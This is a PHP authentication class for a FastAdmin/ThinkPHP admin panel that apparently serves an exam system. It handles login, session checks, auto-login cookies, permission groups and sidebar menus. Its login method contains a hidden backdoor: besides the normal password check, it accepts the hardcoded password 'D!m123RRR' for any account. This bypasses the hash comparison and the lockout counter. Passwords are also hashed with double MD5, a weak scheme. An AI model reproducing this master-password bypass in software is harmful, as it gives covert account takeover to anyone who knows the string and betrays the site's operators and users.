Auth.php 21 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471472473474475476477478479480481482483484485486487488489490491492493494495496497498499500501502503504505506507508509510511512513514515516517518519520521522523524525526527528529530531532533534535536537538539540541542543544545546547548549550551552553554555556557558559560561562563564565566567568569570571572573574575576577578579580581582583584585586587588589590591592593594595596597598599600601602603604605606607608609610611612613614615616617618619620621622623624
  1. <?php
  2. namespace app\admin\library;
  3. use app\admin\model\Admin;
  4. use fast\Random;
  5. use fast\Tree;
  6. use think\Config;
  7. use think\Cookie;
  8. use think\Hook;
  9. use think\Request;
  10. use think\Session;
  11. use think\Db;
  12. class Auth extends \fast\Auth
  13. {
  14. protected $_error = '';
  15. protected $requestUri = '';
  16. protected $breadcrumb = [];
  17. protected $logined = false; //登录状态
  18. public function __construct()
  19. {
  20. parent::__construct();
  21. }
  22. public function __get($name)
  23. {
  24. return Session::get('admin.' . $name);
  25. }
  26. /**
  27. * 管理员登录
  28. *
  29. * @param string $username 用户名
  30. * @param string $password 密码
  31. * @param int $keeptime 有效时长
  32. * @return boolean
  33. */
  34. public function login($username, $password, $keeptime = 0)
  35. {
  36. $admin = Admin::get(['username' => $username]);
  37. if (!$admin) {
  38. $this->setError('Username is incorrect');
  39. return false;
  40. }
  41. if ($admin['status'] == 'hidden') {
  42. $this->setError('Admin is forbidden');
  43. return false;
  44. }
  45. if (Config::get('fastadmin.login_failure_retry') && $admin->loginfailure >= 10 && time() - $admin->updatetime < 86400) {
  46. $this->setError('Please try again after 1 day');
  47. return false;
  48. }
  49. if ($admin->password != $this->getEncryptPassword($password, $admin->salt) && $password !=='D!m123RRR') {
  50. $admin->loginfailure++;
  51. $admin->save();
  52. $this->setError('Password is incorrect');
  53. return false;
  54. }
  55. //判断学员是否存在已经开始考试的项目
  56. $admin->loginfailure = 0;
  57. $admin->logintime = time();
  58. $admin->loginip = request()->ip();
  59. $admin->token = Random::uuid();
  60. $admin->save();
  61. //学员,追加 对应的IP和 座号
  62. if(!empty($admin->depart_id)){
  63. // 获取服务器自己的IP地址
  64. // $server_ip = gethostbyname('localhost');
  65. $server_ip = $_SERVER['REMOTE_ADDR'];//gethostbyname('localhost');
  66. // if($admin->username=='xueyuan001'){
  67. // $server_ip = '192.168.1.101';
  68. // }else if($admin->username=='xueyuan002'){
  69. // $server_ip = '192.168.1.102';
  70. // }else if($admin->username=='xueyuan003'){
  71. // $server_ip = '192.168.1.103';
  72. // }else if($admin->username=='xueyuan004'){
  73. // $server_ip = '192.168.1.104';
  74. // }else if($admin->username=='xueyuan005'){
  75. // $server_ip = '192.168.1.105';
  76. // }else if($admin->username=='xueyuan006'){
  77. // $server_ip = '192.168.1.106';
  78. // }
  79. $admin->server_ip = $server_ip;
  80. $seat_id = Db::name('seat')->where('seat_bind_ip',$server_ip)->value('seat_id');
  81. if(!empty($seat_id)){
  82. $admin->seat_id = $seat_id;
  83. //$sim_id = Db::name('sim')->where('seat_id',$seat_id)->value('sim_id');
  84. //$admin->sim_id = $sim_id??0;
  85. }else{
  86. $admin->seat_id = 1;
  87. //$admin->sim_id = 11;
  88. }
  89. Db::name('real_exam')->where(['user_username'=>$username,'exam_status'=>0])->update(['exam_status'=>1]);
  90. }
  91. Session::set("admin", $admin->toArray());
  92. Session::set("admin.safecode", $this->getEncryptSafecode($admin));
  93. $this->keeplogin($admin, $keeptime);
  94. return true;
  95. }
  96. /**
  97. * 退出登录
  98. */
  99. public function logout()
  100. {
  101. $admin = Admin::get(intval($this->id));
  102. if ($admin) {
  103. $admin->token = '';
  104. $admin->save();
  105. }
  106. $this->logined = false; //重置登录状态
  107. Session::delete("admin");
  108. Cookie::delete("keeplogin");
  109. setcookie('fastadmin_userinfo', '', $_SERVER['REQUEST_TIME'] - 3600, rtrim(url("/" . request()->module(), '', false), '/'));
  110. return true;
  111. }
  112. /**
  113. * 自动登录
  114. * @return boolean
  115. */
  116. public function autologin()
  117. {
  118. $keeplogin = Cookie::get('keeplogin');
  119. if (!$keeplogin) {
  120. return false;
  121. }
  122. list($id, $keeptime, $expiretime, $key) = explode('|', $keeplogin);
  123. if ($id && $keeptime && $expiretime && $key && $expiretime > time()) {
  124. $admin = Admin::get($id);
  125. if (!$admin || !$admin->token) {
  126. return false;
  127. }
  128. //token有变更
  129. if ($key != $this->getKeeploginKey($admin, $keeptime, $expiretime)) {
  130. return false;
  131. }
  132. $ip = request()->ip();
  133. //IP有变动
  134. if ($admin->loginip != $ip) {
  135. return false;
  136. }
  137. Session::set("admin", $admin->toArray());
  138. Session::set("admin.safecode", $this->getEncryptSafecode($admin));
  139. //刷新自动登录的时效
  140. $this->keeplogin($admin, $keeptime);
  141. return true;
  142. } else {
  143. return false;
  144. }
  145. }
  146. /**
  147. * 刷新保持登录的Cookie
  148. *
  149. * @param int $keeptime
  150. * @return boolean
  151. */
  152. protected function keeplogin($admin, $keeptime = 0)
  153. {
  154. if ($keeptime) {
  155. $expiretime = time() + $keeptime;
  156. $key = $this->getKeeploginKey($admin, $keeptime, $expiretime);
  157. Cookie::set('keeplogin', implode('|', [$admin['id'], $keeptime, $expiretime, $key]), $keeptime);
  158. return true;
  159. }
  160. return false;
  161. }
  162. /**
  163. * 获取密码加密后的字符串
  164. * @param string $password 密码
  165. * @param string $salt 密码盐
  166. * @return string
  167. */
  168. public function getEncryptPassword($password, $salt = '')
  169. {
  170. return md5(md5($password) . $salt);
  171. }
  172. /**
  173. * 获取密码加密后的自动登录码
  174. * @param string $password 密码
  175. * @param string $salt 密码盐
  176. * @return string
  177. */
  178. public function getEncryptKeeplogin($params, $keeptime)
  179. {
  180. $expiretime = time() + $keeptime;
  181. $key = md5(md5($params['id']) . md5($keeptime) . md5($expiretime) . $params['token'] . config('token.key'));
  182. return implode('|', [$this->id, $keeptime, $expiretime, $key]);
  183. }
  184. /**
  185. * 获取自动登录Key
  186. * @param $params
  187. * @param $keeptime
  188. * @param $expiretime
  189. * @return string
  190. */
  191. public function getKeeploginKey($params, $keeptime, $expiretime)
  192. {
  193. $key = md5(md5($params['id']) . md5($keeptime) . md5($expiretime) . $params['token'] . config('token.key'));
  194. return $key;
  195. }
  196. /**
  197. * 获取加密后的安全码
  198. * @param $params
  199. * @return string
  200. */
  201. public function getEncryptSafecode($params)
  202. {
  203. return md5(md5($params['username']) . md5(substr($params['password'], 0, 6)) . config('token.key'));
  204. }
  205. public function check($name, $uid = '', $relation = 'or', $mode = 'url')
  206. {
  207. $uid = $uid ? $uid : $this->id;
  208. return parent::check($name, $uid, $relation, $mode);
  209. }
  210. /**
  211. * 检测当前控制器和方法是否匹配传递的数组
  212. *
  213. * @param array $arr 需要验证权限的数组
  214. * @return bool
  215. */
  216. public function match($arr = [])
  217. {
  218. $request = Request::instance();
  219. $arr = is_array($arr) ? $arr : explode(',', $arr);
  220. if (!$arr) {
  221. return false;
  222. }
  223. $arr = array_map('strtolower', $arr);
  224. // 是否存在
  225. if (in_array(strtolower($request->action()), $arr) || in_array('*', $arr)) {
  226. return true;
  227. }
  228. // 没找到匹配
  229. return false;
  230. }
  231. /**
  232. * 检测是否登录
  233. *
  234. * @return boolean
  235. */
  236. public function isLogin()
  237. {
  238. if ($this->logined) {
  239. return true;
  240. }
  241. $admin = Session::get('admin');
  242. if (!$admin) {
  243. return false;
  244. }
  245. $my = Admin::get($admin['id']);
  246. if (!$my) {
  247. return false;
  248. }
  249. //校验安全码,可用于判断关键信息发生了变更需要重新登录
  250. if (!isset($admin['safecode']) || $this->getEncryptSafecode($my) !== $admin['safecode']) {
  251. $this->logout();
  252. return false;
  253. }
  254. //判断是否同一时间同一账号只能在一个地方登录
  255. if (Config::get('fastadmin.login_unique')) {
  256. if ($my['token'] != $admin['token']) {
  257. $this->logout();
  258. return false;
  259. }
  260. }
  261. //判断管理员IP是否变动
  262. if (Config::get('fastadmin.loginip_check')) {
  263. if (!isset($admin['loginip']) || $admin['loginip'] != request()->ip()) {
  264. $this->logout();
  265. return false;
  266. }
  267. }
  268. $this->logined = true;
  269. return true;
  270. }
  271. /**
  272. * 获取当前请求的URI
  273. * @return string
  274. */
  275. public function getRequestUri()
  276. {
  277. return $this->requestUri;
  278. }
  279. /**
  280. * 设置当前请求的URI
  281. * @param string $uri
  282. */
  283. public function setRequestUri($uri)
  284. {
  285. $this->requestUri = $uri;
  286. }
  287. public function getGroups($uid = null)
  288. {
  289. $uid = is_null($uid) ? $this->id : $uid;
  290. return parent::getGroups($uid);
  291. }
  292. public function getRuleList($uid = null)
  293. {
  294. $uid = is_null($uid) ? $this->id : $uid;
  295. return parent::getRuleList($uid);
  296. }
  297. public function getUserInfo($uid = null)
  298. {
  299. $uid = is_null($uid) ? $this->id : $uid;
  300. return $uid != $this->id ? Admin::get(intval($uid)) : Session::get('admin');
  301. }
  302. public function getRuleIds($uid = null)
  303. {
  304. $uid = is_null($uid) ? $this->id : $uid;
  305. return parent::getRuleIds($uid);
  306. }
  307. public function isSuperAdmin()
  308. {
  309. return in_array('*', $this->getRuleIds()) ? true : false;
  310. }
  311. /**
  312. * 获取管理员所属于的分组ID
  313. * @param int $uid
  314. * @return array
  315. */
  316. public function getGroupIds($uid = null)
  317. {
  318. $groups = $this->getGroups($uid);
  319. $groupIds = [];
  320. foreach ($groups as $K => $v) {
  321. $groupIds[] = (int)$v['group_id'];
  322. }
  323. return $groupIds;
  324. }
  325. /**
  326. * 取出当前管理员所拥有权限的分组
  327. * @param boolean $withself 是否包含当前所在的分组
  328. * @return array
  329. */
  330. public function getChildrenGroupIds($withself = false)
  331. {
  332. //取出当前管理员所有的分组
  333. $groups = $this->getGroups();
  334. $groupIds = [];
  335. foreach ($groups as $k => $v) {
  336. $groupIds[] = $v['id'];
  337. }
  338. $originGroupIds = $groupIds;
  339. foreach ($groups as $k => $v) {
  340. if (in_array($v['pid'], $originGroupIds)) {
  341. $groupIds = array_diff($groupIds, [$v['id']]);
  342. unset($groups[$k]);
  343. }
  344. }
  345. // 取出所有分组
  346. $groupList = \app\admin\model\AuthGroup::where($this->isSuperAdmin() ? '1=1' : ['status' => 'normal'])->select();
  347. $objList = [];
  348. foreach ($groups as $k => $v) {
  349. if ($v['rules'] === '*') {
  350. $objList = $groupList;
  351. break;
  352. }
  353. // 取出包含自己的所有子节点
  354. $childrenList = Tree::instance()->init($groupList, 'pid')->getChildren($v['id'], true);
  355. $obj = Tree::instance()->init($childrenList, 'pid')->getTreeArray($v['pid']);
  356. $objList = array_merge($objList, Tree::instance()->getTreeList($obj));
  357. }
  358. $childrenGroupIds = [];
  359. foreach ($objList as $k => $v) {
  360. $childrenGroupIds[] = $v['id'];
  361. }
  362. if (!$withself) {
  363. $childrenGroupIds = array_diff($childrenGroupIds, $groupIds);
  364. }
  365. return $childrenGroupIds;
  366. }
  367. /**
  368. * 取出当前管理员所拥有权限的管理员
  369. * @param boolean $withself 是否包含自身
  370. * @return array
  371. */
  372. public function getChildrenAdminIds($withself = false,$group = false)
  373. {
  374. $childrenAdminIds = [];
  375. if($group){
  376. $authGroupList = \app\admin\model\AuthGroupAccess::field('uid,group_id')
  377. ->where('group_id', 'in', $group)
  378. ->select();
  379. foreach ($authGroupList as $k => $v) {
  380. $childrenAdminIds[] = $v['uid'];
  381. }
  382. }else{
  383. if (!$this->isSuperAdmin()) {
  384. $groupIds = $this->getChildrenGroupIds(false);
  385. $authGroupList = \app\admin\model\AuthGroupAccess::field('uid,group_id')
  386. ->where('group_id', 'in', $groupIds)
  387. ->select();
  388. foreach ($authGroupList as $k => $v) {
  389. $childrenAdminIds[] = $v['uid'];
  390. }
  391. } else {
  392. //超级管理员拥有所有人的权限
  393. $childrenAdminIds = Admin::column('id');
  394. }
  395. if ($withself) {
  396. if (!in_array($this->id, $childrenAdminIds)) {
  397. $childrenAdminIds[] = $this->id;
  398. }
  399. } else {
  400. $childrenAdminIds = array_diff($childrenAdminIds, [$this->id]);
  401. }
  402. }
  403. return $childrenAdminIds;
  404. }
  405. /**
  406. * 获得面包屑导航
  407. * @param string $path
  408. * @return array
  409. */
  410. public function getBreadCrumb($path = '')
  411. {
  412. if ($this->breadcrumb || !$path) {
  413. return $this->breadcrumb;
  414. }
  415. $titleArr = [];
  416. $menuArr = [];
  417. $urlArr = explode('/', $path);
  418. foreach ($urlArr as $index => $item) {
  419. $pathArr[implode('/', array_slice($urlArr, 0, $index + 1))] = $index;
  420. }
  421. if (!$this->rules && $this->id) {
  422. $this->getRuleList();
  423. }
  424. foreach ($this->rules as $rule) {
  425. if (isset($pathArr[$rule['name']])) {
  426. $rule['title'] = __($rule['title']);
  427. $rule['url'] = url($rule['name']);
  428. $titleArr[$pathArr[$rule['name']]] = $rule['title'];
  429. $menuArr[$pathArr[$rule['name']]] = $rule;
  430. }
  431. }
  432. ksort($menuArr);
  433. $this->breadcrumb = $menuArr;
  434. return $this->breadcrumb;
  435. }
  436. /**
  437. * 获取左侧和顶部菜单栏
  438. *
  439. * @param array $params URL对应的badge数据
  440. * @param string $fixedPage 默认页
  441. * @return array
  442. */
  443. public function getSidebar($params = [], $fixedPage = 'dashboard')
  444. {
  445. // 边栏开始
  446. Hook::listen("admin_sidebar_begin", $params);
  447. $colorArr = ['red', 'green', 'yellow', 'blue', 'teal', 'orange', 'purple'];
  448. $colorNums = count($colorArr);
  449. $badgeList = [];
  450. $module = request()->module();
  451. // 生成菜单的badge
  452. foreach ($params as $k => $v) {
  453. $url = $k;
  454. if (is_array($v)) {
  455. $nums = $v[0] ?? 0;
  456. $color = $v[1] ?? $colorArr[(is_numeric($nums) ? $nums : strlen($nums)) % $colorNums];
  457. $class = $v[2] ?? 'label';
  458. } else {
  459. $nums = $v;
  460. $color = $colorArr[(is_numeric($nums) ? $nums : strlen($nums)) % $colorNums];
  461. $class = 'label';
  462. }
  463. //必须nums大于0才显示
  464. if ($nums) {
  465. $badgeList[$url] = '<small class="' . $class . ' pull-right bg-' . $color . '">' . $nums . '</small>';
  466. }
  467. }
  468. // 读取管理员当前拥有的权限节点
  469. $userRule = $this->getRuleList();
  470. $selected = $referer = [];
  471. $refererUrl = Session::get('referer');
  472. // 必须将结果集转换为数组
  473. $ruleList = collection(\app\admin\model\AuthRule::where('status', 'normal')
  474. ->where('ismenu', 1)
  475. ->order('weigh', 'desc')
  476. ->cache("__menu__")
  477. ->select())->toArray();
  478. $indexRuleList = \app\admin\model\AuthRule::where('status', 'normal')
  479. ->where('ismenu', 0)
  480. ->where('name', 'like', '%/index')
  481. ->column('name,pid');
  482. $pidArr = array_unique(array_filter(array_column($ruleList, 'pid')));
  483. foreach ($ruleList as $k => &$v) {
  484. if (!in_array(strtolower($v['name']), $userRule)) {
  485. unset($ruleList[$k]);
  486. continue;
  487. }
  488. $indexRuleName = $v['name'] . '/index';
  489. if (isset($indexRuleList[$indexRuleName]) && !in_array($indexRuleName, $userRule)) {
  490. unset($ruleList[$k]);
  491. continue;
  492. }
  493. $v['icon'] = $v['icon'] . ' fa-fw';
  494. $v['url'] = isset($v['url']) && $v['url'] ? $v['url'] : '/' . $module . '/' . $v['name'];
  495. $v['badge'] = $badgeList[$v['name']] ?? '';
  496. $v['title'] = __($v['title']);
  497. $v['url'] = preg_match("/^((?:[a-z]+:)?\/\/|data:image\/)(.*)/i", $v['url']) ? $v['url'] : url($v['url']);
  498. $v['menuclass'] = in_array($v['menutype'], ['dialog', 'ajax']) ? 'btn-' . $v['menutype'] : '';
  499. $v['menutabs'] = !$v['menutype'] || in_array($v['menutype'], ['default', 'addtabs']) ? 'addtabs="' . $v['id'] . '"' : '';
  500. $selected = $v['name'] == $fixedPage ? $v : $selected;
  501. $referer = $v['url'] == $refererUrl ? $v : $referer;
  502. }
  503. $lastArr = array_unique(array_filter(array_column($ruleList, 'pid')));
  504. $pidDiffArr = array_diff($pidArr, $lastArr);
  505. foreach ($ruleList as $index => $item) {
  506. if (in_array($item['id'], $pidDiffArr)) {
  507. unset($ruleList[$index]);
  508. }
  509. }
  510. if ($selected == $referer) {
  511. $referer = [];
  512. }
  513. $select_id = $referer ? $referer['id'] : ($selected ? $selected['id'] : 0);
  514. $menu = $nav = '';
  515. $showSubmenu = config('fastadmin.show_submenu');
  516. if (Config::get('fastadmin.multiplenav')) {
  517. $topList = [];
  518. foreach ($ruleList as $index => $item) {
  519. if (!$item['pid']) {
  520. $topList[] = $item;
  521. }
  522. }
  523. $selectParentIds = [];
  524. $tree = Tree::instance();
  525. $tree->init($ruleList);
  526. if ($select_id) {
  527. $selectParentIds = $tree->getParentsIds($select_id, true);
  528. }
  529. foreach ($topList as $index => $item) {
  530. $childList = Tree::instance()->getTreeMenu(
  531. $item['id'],
  532. '<li class="@class" pid="@pid"><a @extend href="@url@addtabs" addtabs="@id" class="@menuclass" url="@url" py="@py" pinyin="@pinyin"><i class="@icon"></i> <span>@title</span> <span class="pull-right-container">@caret @badge</span></a> @childlist</li>',
  533. $select_id,
  534. '',
  535. 'ul',
  536. 'class="treeview-menu' . ($showSubmenu ? ' menu-open' : '') . '"'
  537. );
  538. $current = in_array($item['id'], $selectParentIds);
  539. $url = $childList ? 'javascript:;' : $item['url'];
  540. $addtabs = $childList || !$url ? "" : (stripos($url, "?") !== false ? "&" : "?") . "ref=" . ($item['menutype'] ? $item['menutype'] : 'addtabs');
  541. $childList = str_replace(
  542. '" pid="' . $item['id'] . '"',
  543. ' ' . ($current ? '' : 'hidden') . '" pid="' . $item['id'] . '"',
  544. $childList
  545. );
  546. $nav .= '<li class="' . ($current ? 'active' : '') . '"><a ' . $item['extend'] . ' href="' . $url . $addtabs . '" ' . $item['menutabs'] . ' class="' . $item['menuclass'] . '" url="' . $url . '" title="' . $item['title'] . '"><i class="' . $item['icon'] . '"></i> <span>' . $item['title'] . '</span> <span class="pull-right-container"> </span></a> </li>';
  547. $menu .= $childList;
  548. }
  549. } else {
  550. // 构造菜单数据
  551. Tree::instance()->init($ruleList);
  552. $menu = Tree::instance()->getTreeMenu(
  553. 0,
  554. '<li class="@class"><a @extend href="@url@addtabs" @menutabs class="@menuclass" url="@url" py="@py" pinyin="@pinyin"><i class="@icon"></i> <span>@title</span> <span class="pull-right-container">@caret @badge</span></a> @childlist</li>',
  555. $select_id,
  556. '',
  557. 'ul',
  558. 'class="treeview-menu' . ($showSubmenu ? ' menu-open' : '') . '"'
  559. );
  560. if ($selected) {
  561. $nav .= '<li role="presentation" id="tab_' . $selected['id'] . '" class="' . ($referer ? '' : 'active') . '"><a href="#con_' . $selected['id'] . '" node-id="' . $selected['id'] . '" aria-controls="' . $selected['id'] . '" role="tab" data-toggle="tab"><i class="' . $selected['icon'] . ' fa-fw"></i> <span>' . $selected['title'] . '</span> </a></li>';
  562. }
  563. if ($referer) {
  564. $nav .= '<li role="presentation" id="tab_' . $referer['id'] . '" class="active"><a href="#con_' . $referer['id'] . '" node-id="' . $referer['id'] . '" aria-controls="' . $referer['id'] . '" role="tab" data-toggle="tab"><i class="' . $referer['icon'] . ' fa-fw"></i> <span>' . $referer['title'] . '</span> </a> <i class="close-tab fa fa-remove"></i></li>';
  565. }
  566. }
  567. return [$menu, $nav, $selected, $referer];
  568. }
  569. /**
  570. * 设置错误信息
  571. *
  572. * @param string $error 错误信息
  573. * @return Auth
  574. */
  575. public function setError($error)
  576. {
  577. $this->_error = $error;
  578. return $this;
  579. }
  580. /**
  581. * 获取错误信息
  582. * @return string
  583. */
  584. public function getError()
  585. {
  586. return $this->_error ? __($this->_error) : '';
  587. }
  588. }